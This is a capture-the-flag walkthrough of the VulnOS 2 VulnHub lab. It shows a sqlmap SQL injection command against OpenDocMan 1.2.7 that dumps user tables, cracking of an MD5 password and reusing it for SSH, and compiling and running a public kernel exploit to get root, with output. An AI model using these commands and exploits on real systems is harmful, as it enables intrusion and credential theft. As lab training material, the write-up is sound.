tick.Tack

VulnOS: 2

VulnOS: 2 from Vulnhub

Nmap scan result

Nmap scan report for 192.168.0.110
Host is up (0.00042s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc
MAC Address: 08:00:27:33:5D:E9 (Cadmus Computer Systems)

Limited Shell

The index page is the introduction of VulnOSv2, which tells us the target website is under /jabc.

By examining the source code, we can see that the website is based on Drupal 7. But none of existing exploits could work.

Then I turned to navigate every pages. Finally, when I visited the Documentation page, I found some hidden words here. Which tells the customers to visit /jabcd0cs/.

The /jabcd0cs/ is running OpenDocMan with version 1.2.7, which is vulnerable to SQL injection. There’s already an PoC here.

Since the add_value is exploitable, I’ll left the exploit work to sqlmap.

# sqlmap -u 'http://192.168.0.110/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -p add_value --dump-all
---snip---
Database: jabcd0cs
Table: odm_user
[2 entries]
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| id | phone       | Email              | username | password                                 | last_name | first_name | department | pw_reset_code |
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| 1  | 5555551212  | webmin@example.com | webmin   | b78aae356709f8c31118ea613980954b         | min       | web        | 2          | <blank>       |
| 2  | 555 5555555 | guest@example.com  | guest    | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest     | guest      | 2          | NULL          |
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
---snip---

Sqlmap has cracked the password of guest for us. After throwing webmin’s hashed password into an online md5 cracker, it returned “webmin1980” as result.

There’s nothing more I can do with OpenDocMan even logged in as webmin. So I decided to take a try on Password Reuse Attack.

# ssh webmin@192.168.0.110
webmin@192.168.0.110's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Jun 19 11:25:46 CEST 2016

  System load:  0.0               Processes:           86
  Usage of /:   5.8% of 29.91GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 192.168.0.110
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Sun Jun 19 11:25:46 2016 from 192.168.0.105
$

Privilege Escalation

As the welcome messages says:

Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

Escalating privilege to root will be easily done with this exploit.

$ gcc -o exploit 37292.c
$ chmod +x exploit
$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?
#